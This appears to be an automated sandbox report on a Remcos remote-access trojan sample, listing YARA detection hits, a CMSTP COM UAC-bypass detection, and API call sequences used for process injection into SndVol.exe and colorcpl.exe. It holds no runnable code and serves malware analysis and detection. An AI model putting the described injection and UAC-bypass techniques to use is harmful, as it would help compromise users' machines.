              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\SndVol.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C6B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C67A2C NtAllocateVirtualMemory
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C6DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C6DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C6DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C67D78 NtWriteVirtualMemory
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C684C8 NtProtectVirtualMemory
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C67A2A NtAllocateVirtualMemory
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C6DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C68D6E GetThreadContext,SetThreadContext,NtResumeThread
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C68D70 GetThreadContext,SetThreadContext,NtResumeThread
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02ABB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02AB7D78 NtWriteVirtualMemory
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02ABDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02ABDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02ABDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02ABDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02AB8D6E Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: 10_2_02AB8D70 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077EE33D NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C78128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_291467EF ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077E750C ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 00402093 appears 50 times
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 0780551E appears 40 times
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 00434801 appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 00401E65 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 077D2B82 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 00434E70 appears 54 times
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 07805B8D appears 54 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 0445551E appears 40 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 29131E65 appears 34 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 29164E70 appears 54 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 04422B82 appears 34 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 29132093 appears 50 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 04455B8D appears 54 times
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 29164801 appears 41 times
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: String function: 02AA4860 appears 683 times
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: String function: 02AB894C appears 50 times
              Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: String function: 02AA46D4 appears 155 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: String function: 02C689D0 appears 45 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: String function: 02C6894C appears 56 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: String function: 02C544DC appears 74 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: String function: 02C54500 appears 33 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: String function: 02C54860 appears 949 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: String function: 02C546D4 appears 244 times
              Source: jlPBMMQbXC.exe | Binary or memory string: OriginalFilename vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1630792872.000000007F388000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E444000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FCDF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E473000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.0000000002435000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000000.1382432413.0000000000487000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe | Binary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
